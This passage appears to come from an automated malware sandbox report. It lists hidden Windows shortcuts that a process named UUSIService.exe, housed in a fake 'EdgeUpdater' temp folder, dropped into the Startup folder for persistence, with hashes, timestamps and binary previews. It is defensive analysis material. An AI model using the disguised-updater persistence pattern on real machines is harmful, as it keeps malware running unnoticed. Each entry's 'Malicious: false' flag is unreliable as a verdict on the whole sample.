Preview:	L..................F...."...........xj.-....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_10bf0fe91b1c43a78fc3b7a61f2231c5.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:03 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.931470547647464
Encrypted:	false
SSDEEP:	24:8ZqHaDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8UHaDp2l9tJRBzfNZ47/yg
MD5:	6760552A323C334EC20BACB22F4E72F2
SHA1:	6737EAF0B0455D8884B15DAC568C85B80BD430E6
SHA-256:	175BEBE0CAB3786018B74F5D6E1EAF999D026BCE4DAF8413165A62CD7EDE8AE3
SHA-512:	2DC471DD3B12AA94A6B692549B6EBB88930C56F31E8C09D3AE8498191EA6BFFB1E477642D03CD38891A47DAA2111A2F34DFFCF792ABF3C57EEF69C4A9D7C920D
Malicious:	false
Preview:	L..................F...."...........v.;....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+}.;........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_113088e5c96340fe9fe76c1c18993310.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:51 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9252787438353
Encrypted:	false
SSDEEP:	24:8ZsHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8+HfNDp2l9tJRBzfNZ47/yg
MD5:	02082FB350870C5EAA9055798BD24860
SHA1:	DD1304A4F1732306150168D46BE6A8359F63D3E6
SHA-256:	31F0DE7AABC44ED8D86B99556001789224E1F9E922EC69723C06AA0BE0C662A8
SHA-512:	BA5016FD4DCC09AFD8E85A4648348088388736BD4B01BB12D2F39AA4C6FDAFE47514397603DA76C51517630CD787CB7A1EC094A9B8A15C4D533A162A768E6008
Malicious:	false
Preview:	L..................F...."............^......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_12f45bea53024d9d8c00badd69f29523.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:21 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.90993686760464
Encrypted:	false
SSDEEP:	24:8ZQLHZDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8+LHZDp2l9tJRBzfNZ47/yg
MD5:	4B6828647F394C89F621E09908B64E55
SHA1:	F788475C3E72DBCA80D7F9FC9BAD4F0CFC3B7024
SHA-256:	D35DF2D5B71F33F403AFD5FB26B4D570C9963F4CE5A10342B3107832EC502635
SHA-512:	9383CA6D6D6667FE1832F1780576183DFBE86A956DE369352842C51416EBAC93C5BF0758DA1B9730BEE2DEC44348716805B3E8C2962129D595ADBF9EE806B08A
Malicious:	false
Preview:	L..................F...."...........cmcF....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S...........-.E........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_14f5035470644de6885cf4a339dafe4a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:49 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925056897643773
Encrypted:	false
SSDEEP:	24:8ZyHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8QHfNDp2l9tJRBzfNZ47/yg
MD5:	20D520CB970FFB4403D9000239E0F2A7
SHA1:	81E9E0B3895DC210A609B446BD9C85D31BEFD9A7
SHA-256:	BC0F42EE92B754A487EE56E35B26F34E0B22A9F7621E6D67F54979647CFF9B2F
SHA-512:	61F2C30BE8363300C54E4C66E4C011889E8BE19BA1AC50EC8215FEF68304D3D50AFCB2D2383619ED8771F4AB67B1C8229184E2820DE61D398681F4D25F884DDF
Malicious:	false
Preview:	L..................F...."...........N.?3....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_15c7869d6b034fb18c8267be118b1866.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:02 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927950236716852
Encrypted:	false
SSDEEP:	24:8ZrLHaDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:81HaDp2l9tJRBzfNZ47/yg
MD5:	22114634AA8CDD54BF73323ED6700361
SHA1:	7717A554AEA3DA8C0A79956FB6774DD4030018DC
SHA-256:	10A729F6652113E0646E14400A16E08A1FAF3EED192C71FD90F11FBC0BD5D3C2
SHA-512:	748185E0ED449A2E32768B994004AB095E610B1CF6BD0FE1DE2FA7C25FFECFAFB587A11F6E911478042B9386BC8311E29CB774824A4202571D343E6ED11777ED
Malicious:	false
Preview:	L..................F...."...........G..:....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+}.;........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1a113a4199bf4054a4adc218255c32a0.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:45 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92402433768611
Encrypted:	false
SSDEEP:	24:8ZrHLSDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8BHLSDp2l9tJRBzfNZ47/yg
MD5:	3888BD1F82FAE5F463683637853732F6
SHA1:	E407E0CCE013F49110123443B0D15ECC46B72308
SHA-256:	CE849EE28C5FBD5BB52D79613B61DD00EECFC74171174D49C5778B6B44B4783C
SHA-512:	F642CB1ED6366741037A41F1DB4D91810159E260BF7A11C20B330AA733C45BA5F4A1A7C1A31F6EA209ADD702020F7B1511FABB96CD557DE14AA5F6C8444308F9
Malicious:	false
Preview:	L..................F....".............nT....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............%S........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1fa187bbc2874f1487c5057329c50e63.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:07 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9218308821273125
Encrypted:	false
SSDEEP:	24:8ZcHuDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8OHuDp2l9tJRBzfNZ47/yg
MD5:	8CA8C84C12980739D14235386D60847C
SHA1:	608DA6C550B4E8FD3D07337E93DC429B959D8280
SHA-256:	E196C71FBB06D6AB32DE8E883184F291145EEEEF71CD36D6319DB88C0DC32593
SHA-512:	3434E368997B33612ACB36D4933BE3697BF0446049B0FB27048D9AD90DDAB80B91EA7E1512134CBFFF0BE616D2E81F2194A65D217424877175BCCD8856EAC98D
Malicious:	false
Preview:	L..................F...."............X1>....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........*s.=........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1fea5c584df64a41b9220675ab62d7f9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:49 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925328266635422
Encrypted:	false
SSDEEP:	24:8ZAHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8qHfNDp2l9tJRBzfNZ47/yg
MD5:	3F45AEA93A2A8FCD658561089612CCAC
SHA1:	7001F77BD507523861B43FF2FB29E5E02988E3C0
SHA-256:	17A2FFEACA8270E3C43E33101826F6BB8802494EC64E0A754F0D2F17E67BA5E9
SHA-512:	D35CDBF3453336870694E3ECEB5D68DB368FF93EE9FC5A318911C4C213AD0A7BC91A256B81006BF336ED5AD48D93082763670113AD5B6D596ECD25C351ADD8A5
Malicious:	false
Preview:	L..................F...."............E[.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1fee30c3ec7e4c77948efd5a4192bb7c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:32 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.918751214045899
Encrypted:	false
SSDEEP:	24:8ZYCYHICcDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8DYHICcDp2l9tJRBzfNZ47/yg
MD5:	7352A58AF2969F25950B3106BD7FB28D
SHA1:	848736C79D0D4B1952CCFD7A59F4EA165201125A
SHA-256:	18397AC82581F08196C143B7E600723DC398C3B3AB8753231038C1A3BC8FFDD2
SHA-512:	75C1A1C76695E00CE9606C98681C915EA3F1CDC9DD89F21D0154BF45846262B8943E467C2FD1C4BE20E5163B4C91191757EC004F5F3931FE72D051368F72825A
Malicious:	false
Preview:	L..................F...."...........zH.L....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............,L........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_225b3b92b5ed431a998b13aa9f182277.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:45 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.919433349267589
Encrypted:	false
SSDEEP:	24:8ZDHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8hHfNDp2l9tJRBzfNZ47/yg
MD5:	F05E57338872B3E08F8A93F1808CE857
SHA1:	EDD1BD0CCBDDFBAABE247871A52EB1577433ED89
SHA-256:	A2B94F4AD138DA5AF6A60A053BE3A44F74BE0A7C6F675569E36B5DE7F529B705
SHA-512:	1AE75E96B5A79A7F20BD597D46BAFA7C799E994259B6206E0B6DCD386F1EC84BC7CF8CD073A0E253FD50434B02202E97DC60C91FD13B1663AD62C7D03A134E19
Malicious:	false
Preview:	L..................F...."...........\..0....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2615dcf28a8f4e5fa5a8ed2977c478b6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:46 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.918694044265085
Encrypted:	false
SSDEEP:	24:8ZqHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8kHfNDp2l9tJRBzfNZ47/yg
MD5:	8F620041CE3C2B846DD33DE88CCD7BA5
SHA1:	BAB6921755CD54E956CE24DAB3B0644F281ED69D
SHA-256:	39382B54FBF435B9662C2673955AB96E7ADA465333871678660417D07C93C13B
SHA-512:	4FA213049007625834091BFC01D502340599729038A9EA63A8EF904C4D4143B11C8B0F98FD9035742BBFABE3E46096CFA76242ED043237F45A5EF9B1E2F68347
Malicious:	false
Preview:	L..................F....".............l1....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_26308272c30649dda16740d38c231251.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:52 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922969533858633
Encrypted:	false
SSDEEP:	24:8ZYi6HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8V6HfNDp2l9tJRBzfNZ47/yg
MD5:	EF3388C13738527D4E35151EC9F16A3C
SHA1:	664A4A4135C2D34ED6307796D1B18D5125D4EF5B
SHA-256:	E8C6DD99E10B44938B4637E6AFE97B7CECC79009D19C3B309751703C931E5FB8
SHA-512:	816AFB221A8D832BF6E50685588A22CD2616ABA76FDC58E060A90E10DDBA17ADAB19B1E8CFE9584FEC578D52D23DF9B6D306BEC8A356703679280222D695E033
Malicious:	false
Preview:	L..................F....".............5.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2766c11f47fe496a9c32a4f4d3b0e72d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:46 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.920522048847973
Encrypted:	false
SSDEEP:	24:8ZLHLSDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8pHLSDp2l9tJRBzfNZ47/yg
MD5:	D5F1DD23CB1CBAA1C12B87051E64D9E8
SHA1:	E6F2FF4C5825F421C6B9FD0DC0F763DFE071CF68
SHA-256:	D6A2BEB10E4FD85E36ED345AF74CF6CCF31387836EF98003ED6B98F3CF54C64C
SHA-512:	B276F5AF2BC357AEE9AD33FD3E2DCCDF7C60564169301369E78106A03CF380D9C72FBBCA23252C4CA11267F99847D43E3523AD8EE124727D1179F842F53DF33A
Malicious:	false
